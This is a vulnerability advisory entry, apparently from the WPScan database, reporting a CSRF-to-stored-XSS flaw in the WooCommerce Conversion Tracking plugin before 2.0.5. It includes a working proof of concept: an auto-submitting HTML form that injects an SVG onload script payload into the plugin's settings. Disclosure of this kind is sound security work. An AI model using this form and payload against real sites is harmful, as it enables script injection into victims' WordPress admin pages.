WooCommerce Conversion Tracking < 2.0.5 - CSRF to XSS



Description
The settings page of the plugin is lacking CSRF checks as well as input sanitisation, leading to stored XSS.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://wp.lab/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="settings[facebook][enabled]" value="1" />
      <input type="hidden" name="settings[facebook][0][pixel_id]" value='"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="action" value="wcct_save_settings" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 2.0.5

References

URL https://plugins.trac.wordpress.org/changeset/2220764

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 54986
Verified No
WPVDB ID 10001

Timeline

Publicly Published 2020-01-03 (20 days ago)
Added 2020-01-03 (19 days ago)
Last Updated 2020-01-03 (19 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin